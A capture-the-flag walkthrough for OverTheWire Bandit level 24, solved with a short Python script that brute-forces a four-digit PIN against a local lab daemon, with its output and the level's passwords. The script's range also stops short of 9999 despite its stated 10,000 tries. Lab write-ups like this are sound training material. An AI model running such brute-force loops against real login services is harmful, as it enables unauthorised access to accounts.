Bandit24 - bandit25

From JaxHax
Jump to navigation Jump to search

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinaties, called brute-forcing.


Solution

Ahh... A simple brute force challenge. Let's go ahead and assume we need a script and setup a folder in the temp directory.

bandit24@melinda:~$ ls -la
total 20
drwxr-xr-x   2 root root 4096 Nov 15 14:55 .
drwxr-xr-x 167 root root 4096 Mar 21 06:46 ..
-rw-r--r--   1 root root  220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root 3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root root  675 Apr  9  2014 .profile

bandit24@melinda:~$ mkdir /tmp/brutez/

bandit24@melinda:~$ cd /tmp/brutez/


Now let's just test out how the server works.

bandit24@melinda:/tmp/brutez$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
a
Fail! You did not supply enough data. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ0001
Fail! You did not supply enough data. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001           
Wrong! Please enter the correct pincode. Try again.


So now we have our fail string. Let's make ourselfs a script that will report when we don't see the error message. I choose to make this a python script called brute_em.py in my tmp directory

import socket

passwd = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

print " [*] Connecting to 127.0.0.1:30002..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 30002))

buf = s.recv(1024)

print " [*] Launching Brute force loop..."
for i in xrange(0,9999):
   s.send(passwd + " " + str(i).zfill(4) + "\n")
   buf = s.recv(1024)
   if buf.find("Wrong!") == -1:
      print " [*] Pin " + str(i) + " returned: " + buf
      break

print " [*] Closing Socket...\n"
s.close()


This script attempts to try all 10,000 posible combos and report when we find it. Let's give it a shot.

bandit24@melinda:/tmp/brutez$ python brute_em.py 
 [*] Connecting to 127.0.0.1:30002...
 [*] Launching Brute force loop...
 [*] Pin 5669 returned: Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

 [*] Closing Socket...